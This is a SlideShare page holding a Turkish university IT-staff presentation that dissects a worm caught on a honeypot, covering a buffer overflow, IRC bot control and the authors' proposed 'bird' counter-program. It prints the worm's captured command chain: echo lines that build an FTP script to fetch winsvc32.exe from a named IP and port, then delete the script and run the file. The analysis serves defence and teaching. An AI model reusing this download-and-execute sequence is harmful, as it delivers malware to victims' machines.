SlideShare ist ein Scribd-Unternehmen logo
BİR WORM’UN ANATOMİSİ
Gökhan AKIN Asım GÜNEŞ
gokhan.akin@itu.edu.tr
asim.gunes@itu.edu.tr
İTÜ Bilgi İşlem Daire Bşk.
Bu konu nerden çıktı?
Ağdaki İstenmeyen Trafik
• P2P trafiği
• Kullanıcının bilgisi dahiliden olmadan
bilgisayarının yarattığı trafik. Peki kim bu ?
Worm Nedir?
Worm sözcüğü Türkçe'de kurt, solucan
anlamlarına sahiptir.
Worm Nedir?
• Worm, kendi
kopyalarını ya da
parçalarını başka
bilgisayar sistemlerine
yayabilen bir program
ya da program
kümesidir. Yayılma
genellikle ağ
bağlantıları üzerinden
ya da e-posta ekleri
yoluyla gerçekleşir.
Worm Bulaşacak Bilgisayar Lazım
Yem Bilgisayar Hazır
Ve Son Olarak...
Ve Bekleme... Ama Neyi 
Paketleri İnceleme
Ve Birşey Bulduk Galiba
Buffer Overflow
• “buffer” geçici olarak kullanılan bellek
bölgesine verilen addır. Eğer yanlışlıkla
(veya bilerek…) buffer’a buffer’ın
boyutundan daha fazla veri yazdırırsanız
(buna “buffer overflow” denir) buffer taşar
ve “return address” inin üzerine yazar.
Buffer Overflow
İşletilen Komutlar
1- cmd /c: Peşinden gelen dizini komut satırında çalıştır ve daha sonra
pencereyi kapat.
2- Aşağıda belirtilmiş satırları sırası ile “ii” isimli yeni oluşturulan dosyanın içine
yaz.
- echo open 160.75.200.200 7690 >> ii
- echo user 1 1 >> ii
- echo get winsvc32.exe >> ii
- echo bye >> ii
3- ftp -n -v -s:ii : ftp programını aşağıda detayları verilmiş parametreler ile aç.
“-n”: Otomatik kullanıcı adı şifre sorma kısmını atla.
“-v”: Bağlanılan sunucunun yolladığı yazıları atla.
“-s ii” : “ii” isimli dosyadaki komutları çalıştır. Yani 160.75.200.200 isimli
sunucunun 7690inci portuna bağlan, kullanıcı adı şifre olarak 1 ve 1 ver.
Winsvc32.exe isimli dosyayı ftp sunucusunda idir ve ftp programını kapat.
4- del ii : Ftp erisimde kullanılanı ii isimli dosyayı sil.
5- winsvc32.exe : Wormu çalıştır.
Gerçekten bir FTP Sunucusuna
Bağlantı Kurulmuş mu?
Winsvc32.exe Ne?
Bir Bilene Sorduk
EXPLOIT
• Yetkisi olmadan daha yetkili bir
kullanıcının (Linux’de root kullanıcısı ,
Windows’da administrator kullanıcısı gibi)
yetkilerine, işletim sistemin zaaflarından
yararlanarak sahip olmayı sağlayan
programlar...
Ne çok var!
Örnek Hazır Kod
Sonra Ne Oldu?
Sutt.p0rr.org
Sonra Ne Olmuştu?
Biz de Bağlandık
Yani Sadece Worm Değil Aynı
Zamanda Bir TRUVA ATI
Bir bilgisayarın
uzaktan kullanıcının
bilgisi haricinde,
kendi amaçları için
yönetilmesini
sağlayan program.
Ya da BOT’ta denebilir
Kullanıcının bilgisi
dışında DDoS
salıdırısı
gerçekleştirmek,
SPAM mektup
yollamak vs için
yazılmış yazılımlar.
Elimizdeki Worm Kısaca
1. Bir FTP sunucu barındıran
2. Gereken EXPLOIT kodunu barındıran
3. Kendini FTP üzerinde kopyalayan
4. IRC sunucusuna bağlanıp emir alan
bir program.
Yeni Worm Yazmak
En kötüsü bir kere programlanmış bir worm daha
sonra kodunda yapılacak çok küçük bir
müdahale ile yeni exploitler için revize edilip
tekrar tehdidini sürdürmeye devam etmektedir.
Bizde Bir Program Yazalım O
Zaman
Nasıl Bir Program?
Ama biz worm değil bir Kuş programı yazalım.
Peki Kuş neler yapabilir?
Kurtları yer  Yani :
Aynı EXPLOIT’i kullanarak;
Kullanıcı bilgisayarında bir uyarı mesajı çıkartılabilir.
Worm’lanma riski taşıyan bilgisayarların listesini çıkartabilir.
Ve hatta uzaktan gerken güvenlik yamasını bile yapabilir
Karga V1.0
Karga V1.0
SONUÇ
Wormlar bulaştığı bilgisayardan her türlü
bilgi hırsızlığı yapabildiği gibi:
- Kendini bulaştırmak için yarattıkları trafik
ile de bant genişliğinin israfı
-Ağ cihazlarında gereksiz işlemci yüküne
-Toplu bir DoS atağı yapmaları durumunda
bütün altyapıyı çalımaz hale getirebilir.
SONUÇ
Wormlar ile sebep olunan durumlar ciddi bir
ulusal güvenlik sorunu oluşturmaktadır.
Bunun için A.B.D.’de Ulusal CERT kurumlarının
sponsorluğu ile Ulusal Güvenlik Açıkları Veritabanı
oluşturulmuştur.
National Vulnerability Database,
http://nvd.nist.gov/
Sorular ve CevaplarSorular ve Cevaplar
www2.itu.edu.tr/~akingok

Weitere ähnliche Inhalte

Andere mochten auch

Evaluación final 102802_1
Evaluación final 102802_1Evaluación final 102802_1
Evaluación final 102802_1
Marcopolo4502
 
List of-run-commande
List of-run-commandeList of-run-commande
List of-run-commande
Abid Anwar
 
Kampüs Ağlarında Aranan Kullanıcının Tespiti
Kampüs Ağlarında Aranan Kullanıcının TespitiKampüs Ağlarında Aranan Kullanıcının Tespiti
Kampüs Ağlarında Aranan Kullanıcının Tespiti
Gökhan AKIN
 
Zvýšení výkonu PPC kampaní díky auditu kampaní - Marketing Festival 2014
Zvýšení výkonu PPC kampaní díky auditu kampaní - Marketing Festival 2014Zvýšení výkonu PPC kampaní díky auditu kampaní - Marketing Festival 2014
Zvýšení výkonu PPC kampaní díky auditu kampaní - Marketing Festival 2014
Ondřej Krišica
 
Petr Hovorka / Trendy ve vývoji pracovních nabídek
Petr Hovorka / Trendy ve vývoji pracovních nabídekPetr Hovorka / Trendy ve vývoji pracovních nabídek
Petr Hovorka / Trendy ve vývoji pracovních nabídek
Petr Hovorka
 
Fundamentos de SEO
Fundamentos de SEOFundamentos de SEO
Fundamentos de SEO
Doc Kodam
 
BrandBook společnosti AspectWorks
BrandBook společnosti AspectWorksBrandBook společnosti AspectWorks
BrandBook společnosti AspectWorks
BrandBakers
 
presentacion de los monos
presentacion de los monospresentacion de los monos
presentacion de los monos
jesusgarcia14999
 
09342ea8835f8a19e344df721c7a304d
09342ea8835f8a19e344df721c7a304d09342ea8835f8a19e344df721c7a304d
09342ea8835f8a19e344df721c7a304d
kalanixa
 
Sharing the Grace
Sharing the Grace Sharing the Grace
Sharing the Grace
Rev. Kim Kie
 
Začněte už od začátku stavět svůj lovebrand
Začněte už od začátku stavět svůj lovebrandZačněte už od začátku stavět svůj lovebrand
Začněte už od začátku stavět svůj lovebrand
Lovebrand
 

Andere mochten auch (11)

Evaluación final 102802_1
Evaluación final 102802_1Evaluación final 102802_1
Evaluación final 102802_1
 
List of-run-commande
List of-run-commandeList of-run-commande
List of-run-commande
 
Kampüs Ağlarında Aranan Kullanıcının Tespiti
Kampüs Ağlarında Aranan Kullanıcının TespitiKampüs Ağlarında Aranan Kullanıcının Tespiti
Kampüs Ağlarında Aranan Kullanıcının Tespiti
 
Zvýšení výkonu PPC kampaní díky auditu kampaní - Marketing Festival 2014
Zvýšení výkonu PPC kampaní díky auditu kampaní - Marketing Festival 2014Zvýšení výkonu PPC kampaní díky auditu kampaní - Marketing Festival 2014
Zvýšení výkonu PPC kampaní díky auditu kampaní - Marketing Festival 2014
 
Petr Hovorka / Trendy ve vývoji pracovních nabídek
Petr Hovorka / Trendy ve vývoji pracovních nabídekPetr Hovorka / Trendy ve vývoji pracovních nabídek
Petr Hovorka / Trendy ve vývoji pracovních nabídek
 
Fundamentos de SEO
Fundamentos de SEOFundamentos de SEO
Fundamentos de SEO
 
BrandBook společnosti AspectWorks
BrandBook společnosti AspectWorksBrandBook společnosti AspectWorks
BrandBook společnosti AspectWorks
 
presentacion de los monos
presentacion de los monospresentacion de los monos
presentacion de los monos
 
09342ea8835f8a19e344df721c7a304d
09342ea8835f8a19e344df721c7a304d09342ea8835f8a19e344df721c7a304d
09342ea8835f8a19e344df721c7a304d
 
Sharing the Grace
Sharing the Grace Sharing the Grace
Sharing the Grace
 
Začněte už od začátku stavět svůj lovebrand
Začněte už od začátku stavět svůj lovebrandZačněte už od začátku stavět svůj lovebrand
Začněte už od začátku stavět svůj lovebrand
 

Ähnlich wie Bir Worm 'un Anatomisi

Bilgisayar Virusleri
Bilgisayar VirusleriBilgisayar Virusleri
Bilgisayar Virusleri
kurtayfun
 
G.yazlimlari
G.yazlimlariG.yazlimlari
G.yazlimlari
Hamza Şentürk
 
Davetsiz misafirleri nasil tesbit eder ve onlardan nasil kurtulabiliriz
Davetsiz misafirleri nasil tesbit eder ve onlardan nasil kurtulabilirizDavetsiz misafirleri nasil tesbit eder ve onlardan nasil kurtulabiliriz
Davetsiz misafirleri nasil tesbit eder ve onlardan nasil kurtulabilirizilker kayar
 
Vi̇rüsler Hakkında Bilmeniz Gerekenler
Vi̇rüsler Hakkında Bilmeniz GerekenlerVi̇rüsler Hakkında Bilmeniz Gerekenler
Vi̇rüsler Hakkında Bilmeniz Gerekenler
serpil
 
Virüsler veçeşitlerisunum
Virüsler veçeşitlerisunumVirüsler veçeşitlerisunum
Virüsler veçeşitlerisunum
Celal Karaca
 
Virusler
ViruslerVirusler
Virusler
Ramadan ŞANLI
 
Jetico personal firewall 2
Jetico personal firewall 2Jetico personal firewall 2
Jetico personal firewall 2Mutlu
 
Bilgisayar virusleri
Bilgisayar virusleriBilgisayar virusleri
Bilgisayar virusleri
Safa nuri Ekici
 
Hafta2_CasusYazılımlar
Hafta2_CasusYazılımlarHafta2_CasusYazılımlar
Hafta2_CasusYazılımlarerince
 
Hatice Büşra TÜRKAN - VİRÜSLER
Hatice Büşra TÜRKAN - VİRÜSLERHatice Büşra TÜRKAN - VİRÜSLER
Hatice Büşra TÜRKAN - VİRÜSLER
Celal Karaca
 
Virüsler ve çeşitleri
Virüsler ve çeşitleriVirüsler ve çeşitleri
Virüsler ve çeşitleriSlide Sharer
 
Kötü Niyetli Programlar ve Bu Programları Engelleyici Programlar.pptx
Kötü Niyetli Programlar ve Bu Programları Engelleyici Programlar.pptxKötü Niyetli Programlar ve Bu Programları Engelleyici Programlar.pptx
Kötü Niyetli Programlar ve Bu Programları Engelleyici Programlar.pptx
Abbasgulu Allahverdili
 
Odinaff Zararlısı Analizi
Odinaff Zararlısı AnaliziOdinaff Zararlısı Analizi
Odinaff Zararlısı Analizi
Leylim Damla Çetin
 
Zararvericilojik
ZararvericilojikZararvericilojik
Zararvericilojikeroglu
 
Zararlı Yazılım Analizi (ÖZET)
Zararlı Yazılım Analizi (ÖZET)Zararlı Yazılım Analizi (ÖZET)
Zararlı Yazılım Analizi (ÖZET)
Alper Başaran
 
Network
NetworkNetwork
Network
Turgay Kaya
 
Network Hacking
Network HackingNetwork Hacking
Network Hacking
Kale Siber Akademi
 

Ähnlich wie Bir Worm 'un Anatomisi (20)

Bilgisayar Virusleri
Bilgisayar VirusleriBilgisayar Virusleri
Bilgisayar Virusleri
 
G.yazlimlari
G.yazlimlariG.yazlimlari
G.yazlimlari
 
Davetsiz misafirleri nasil tesbit eder ve onlardan nasil kurtulabiliriz
Davetsiz misafirleri nasil tesbit eder ve onlardan nasil kurtulabilirizDavetsiz misafirleri nasil tesbit eder ve onlardan nasil kurtulabiliriz
Davetsiz misafirleri nasil tesbit eder ve onlardan nasil kurtulabiliriz
 
Vi̇rüsler Hakkında Bilmeniz Gerekenler
Vi̇rüsler Hakkında Bilmeniz GerekenlerVi̇rüsler Hakkında Bilmeniz Gerekenler
Vi̇rüsler Hakkında Bilmeniz Gerekenler
 
Virüsler veçeşitlerisunum
Virüsler veçeşitlerisunumVirüsler veçeşitlerisunum
Virüsler veçeşitlerisunum
 
Virusler
ViruslerVirusler
Virusler
 
Jetico personal firewall 2
Jetico personal firewall 2Jetico personal firewall 2
Jetico personal firewall 2
 
Bilgisayar virusleri
Bilgisayar virusleriBilgisayar virusleri
Bilgisayar virusleri
 
VirüSs
VirüSsVirüSs
VirüSs
 
Hafta2_CasusYazılımlar
Hafta2_CasusYazılımlarHafta2_CasusYazılımlar
Hafta2_CasusYazılımlar
 
Hatice Büşra TÜRKAN - VİRÜSLER
Hatice Büşra TÜRKAN - VİRÜSLERHatice Büşra TÜRKAN - VİRÜSLER
Hatice Büşra TÜRKAN - VİRÜSLER
 
Virüsler ve çeşitleri
Virüsler ve çeşitleriVirüsler ve çeşitleri
Virüsler ve çeşitleri
 
Kötü Niyetli Programlar ve Bu Programları Engelleyici Programlar.pptx
Kötü Niyetli Programlar ve Bu Programları Engelleyici Programlar.pptxKötü Niyetli Programlar ve Bu Programları Engelleyici Programlar.pptx
Kötü Niyetli Programlar ve Bu Programları Engelleyici Programlar.pptx
 
Odinaff Zararlısı Analizi
Odinaff Zararlısı AnaliziOdinaff Zararlısı Analizi
Odinaff Zararlısı Analizi
 
Zararvericilojik
ZararvericilojikZararvericilojik
Zararvericilojik
 
Internet.ppt_4
Internet.ppt_4Internet.ppt_4
Internet.ppt_4
 
VİRÜS
VİRÜSVİRÜS
VİRÜS
 
Zararlı Yazılım Analizi (ÖZET)
Zararlı Yazılım Analizi (ÖZET)Zararlı Yazılım Analizi (ÖZET)
Zararlı Yazılım Analizi (ÖZET)
 
Network
NetworkNetwork
Network
 
Network Hacking
Network HackingNetwork Hacking
Network Hacking
 

Bir Worm 'un Anatomisi

  • 1. BİR WORM’UN ANATOMİSİ Gökhan AKIN Asım GÜNEŞ gokhan.akin@itu.edu.tr asim.gunes@itu.edu.tr İTÜ Bilgi İşlem Daire Bşk.
  • 2. Bu konu nerden çıktı?
  • 3. Ağdaki İstenmeyen Trafik • P2P trafiği • Kullanıcının bilgisi dahiliden olmadan bilgisayarının yarattığı trafik. Peki kim bu ?
  • 4. Worm Nedir? Worm sözcüğü Türkçe'de kurt, solucan anlamlarına sahiptir.
  • 5. Worm Nedir? • Worm, kendi kopyalarını ya da parçalarını başka bilgisayar sistemlerine yayabilen bir program ya da program kümesidir. Yayılma genellikle ağ bağlantıları üzerinden ya da e-posta ekleri yoluyla gerçekleşir.
  • 9. Ve Bekleme... Ama Neyi 
  • 12. Buffer Overflow • “buffer” geçici olarak kullanılan bellek bölgesine verilen addır. Eğer yanlışlıkla (veya bilerek…) buffer’a buffer’ın boyutundan daha fazla veri yazdırırsanız (buna “buffer overflow” denir) buffer taşar ve “return address” inin üzerine yazar.
  • 14. İşletilen Komutlar 1- cmd /c: Peşinden gelen dizini komut satırında çalıştır ve daha sonra pencereyi kapat. 2- Aşağıda belirtilmiş satırları sırası ile “ii” isimli yeni oluşturulan dosyanın içine yaz. - echo open 160.75.200.200 7690 >> ii - echo user 1 1 >> ii - echo get winsvc32.exe >> ii - echo bye >> ii 3- ftp -n -v -s:ii : ftp programını aşağıda detayları verilmiş parametreler ile aç. “-n”: Otomatik kullanıcı adı şifre sorma kısmını atla. “-v”: Bağlanılan sunucunun yolladığı yazıları atla. “-s ii” : “ii” isimli dosyadaki komutları çalıştır. Yani 160.75.200.200 isimli sunucunun 7690inci portuna bağlan, kullanıcı adı şifre olarak 1 ve 1 ver. Winsvc32.exe isimli dosyayı ftp sunucusunda idir ve ftp programını kapat. 4- del ii : Ftp erisimde kullanılanı ii isimli dosyayı sil. 5- winsvc32.exe : Wormu çalıştır.
  • 15. Gerçekten bir FTP Sunucusuna Bağlantı Kurulmuş mu?
  • 18. EXPLOIT • Yetkisi olmadan daha yetkili bir kullanıcının (Linux’de root kullanıcısı , Windows’da administrator kullanıcısı gibi) yetkilerine, işletim sistemin zaaflarından yararlanarak sahip olmayı sağlayan programlar...
  • 25. Yani Sadece Worm Değil Aynı Zamanda Bir TRUVA ATI Bir bilgisayarın uzaktan kullanıcının bilgisi haricinde, kendi amaçları için yönetilmesini sağlayan program.
  • 26. Ya da BOT’ta denebilir Kullanıcının bilgisi dışında DDoS salıdırısı gerçekleştirmek, SPAM mektup yollamak vs için yazılmış yazılımlar.
  • 27. Elimizdeki Worm Kısaca 1. Bir FTP sunucu barındıran 2. Gereken EXPLOIT kodunu barındıran 3. Kendini FTP üzerinde kopyalayan 4. IRC sunucusuna bağlanıp emir alan bir program.
  • 28. Yeni Worm Yazmak En kötüsü bir kere programlanmış bir worm daha sonra kodunda yapılacak çok küçük bir müdahale ile yeni exploitler için revize edilip tekrar tehdidini sürdürmeye devam etmektedir.
  • 29. Bizde Bir Program Yazalım O Zaman
  • 30. Nasıl Bir Program? Ama biz worm değil bir Kuş programı yazalım. Peki Kuş neler yapabilir? Kurtları yer  Yani : Aynı EXPLOIT’i kullanarak; Kullanıcı bilgisayarında bir uyarı mesajı çıkartılabilir. Worm’lanma riski taşıyan bilgisayarların listesini çıkartabilir. Ve hatta uzaktan gerken güvenlik yamasını bile yapabilir
  • 33. SONUÇ Wormlar bulaştığı bilgisayardan her türlü bilgi hırsızlığı yapabildiği gibi: - Kendini bulaştırmak için yarattıkları trafik ile de bant genişliğinin israfı -Ağ cihazlarında gereksiz işlemci yüküne -Toplu bir DoS atağı yapmaları durumunda bütün altyapıyı çalımaz hale getirebilir.
  • 34. SONUÇ Wormlar ile sebep olunan durumlar ciddi bir ulusal güvenlik sorunu oluşturmaktadır. Bunun için A.B.D.’de Ulusal CERT kurumlarının sponsorluğu ile Ulusal Güvenlik Açıkları Veritabanı oluşturulmuştur. National Vulnerability Database, http://nvd.nist.gov/
  • 35. Sorular ve CevaplarSorular ve Cevaplar www2.itu.edu.tr/~akingok